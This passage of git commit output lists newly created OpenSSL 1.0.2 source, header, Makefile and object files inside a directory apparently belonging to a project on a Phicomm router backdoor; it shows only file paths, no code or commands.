 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.txt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objxref.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_asn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_asn.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_cl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_cl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ext.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ext.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ht.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ht.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_prn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_prn.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_srv.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_srv.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_vfy.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_vfy.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h.in
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslv.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ossl_typ.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pariscid.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/message
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem2.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_all.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_all.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_info.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_info.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_oth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_oth.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pk8.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pk8.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pkey.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pkey.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_seal.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_seal.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_sign.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_sign.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_x509.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_x509.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_xaux.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_xaux.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pkcs7.lis
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pvkfmt.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pvkfmt.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/cbc.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/ppc-xlate.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/readme
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/sparcv9_modes.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86_64-xlate.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86asm.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86gas.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86masm.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86nasm.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_add.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_add.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_asn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_asn.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_attr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_attr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crpt.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crpt.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crt.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crt.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_decr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_decr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_init.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_init.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_key.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_key.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_kiss.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_kiss.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_mutl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_mutl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_npas.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_npas.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8d.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8d.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8e.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8e.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_utl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_utl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pk12err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pk12err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pkcs12.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/bio_pk7.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/bio_pk7.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_asn1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_asn1.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_attr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_attr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_dgst.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_doit.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_doit.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_mime.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_mime.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_smime.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_smime.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppc_arch.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppccap.c
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppccpuid.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pq_test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/md_rand.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/md_rand.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_egd.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_egd.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lcl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_nw.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_nw.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_os2.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_os2.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_unix.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_unix.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_vms.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_win.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_win.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randfile.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randfile.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randtest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_cbc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_cbc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_ecb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_ecb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_skey.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_skey.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2cfb64.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2cfb64.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2ofb64.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2ofb64.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2speed.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rrc2.doc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/tab.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/version
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-586.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-ia64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-md5-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-parisc.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-s390x.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_skey.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_skey.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_utl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_utl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4s.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4speed.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rrc4.doc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/asm/rc5-586.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_ecb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_skey.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5cfb64.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5ofb64.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5s.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5speed.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/README
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/asm/rips.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/asm/rmd-586.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/ripemd.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd160.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_dgst.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_dgst.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_one.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_one.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmdconst.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmdtest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ameth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ameth.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_asn1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_asn1.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_chk.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_chk.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_crpt.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_crpt.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_depr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_depr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_eay.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_eay.o
